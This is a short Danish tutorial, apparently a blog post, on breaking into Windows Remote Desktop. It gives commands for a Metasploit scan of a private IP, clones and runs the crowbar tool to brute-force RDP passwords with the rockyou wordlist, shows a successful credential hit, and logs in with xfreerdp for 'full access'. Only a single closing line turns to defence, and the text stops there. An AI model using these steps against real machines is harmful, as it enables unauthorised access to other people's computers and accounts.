Hacking rdp er blevet meget nemt.
Du skal bruge en kali samt lidt tools.
msf6 > show options
msf6 > Set RHOST 192.168.0.23
RHOST => 192.168.0.23
exploit
Du kan nu se listen over hvilken ip som er åben for rdp.
exit
Du skal også bruge crowbar fra github.
cd git
git clone https://github.com/galkan/crowbar
cd crowbar
./crowbar.py -h
Som jeg viser her bruger vi 192.168.0.23 som attack ip. Protocol er rdp (remote desktop). Bruger navn er brugernavn og den sidste parametre er til password filen som skal bruges. Du vil nu få en liste over hvilken maskiner som det er muligt at tilgå, og du kan til gå den med xfreerdp eksempelvis hvis du er på en Linux maskine.
$ ./crowbar.py --server 192.168.0.23/32 -b rdp -u brugernavn -C /usr/share/wordlists/rockyou.txt 2021-02-10 23:34:50 START 2021-02-10 23:34:50 Crowbar v0.4.3-dev 2021-02-10 23:34:52 Trying 192.168.0.23:3389 2021-02-10 23:34:54 RDP-SUCCESS : 192.168.0.23:3389 - brugernavn:mitkodeord
Hvis du manger password filen kan du installere den som vist her.
$ sudo apt-get install wordlists
For at lave remove desktop til maskinen kan du bruge xfreerdp. Den installeres også nemt med en apt install.
$ sudo apt install xfreerdp
For at starte remove desktop op skal du bruge de parametre som du fik at skanningen.
$ sudo xfreerdp /u:brugernavn /p:mitkodeord /v:192.168.0.23
Hvis den ikke er installeret kan du nemt installere den med apt som vist her.
$ sudo apt install freerdp2-x11 $ sudo xfreerdp /u:brugernavn /p:mitkodeord /v:192.168.0.23
Du har nu fuld adgang med remote desktop til maskinen.
For at stoppe den slags attack kan du gøre følgende i Windows.
Start programmet Local Security Policy
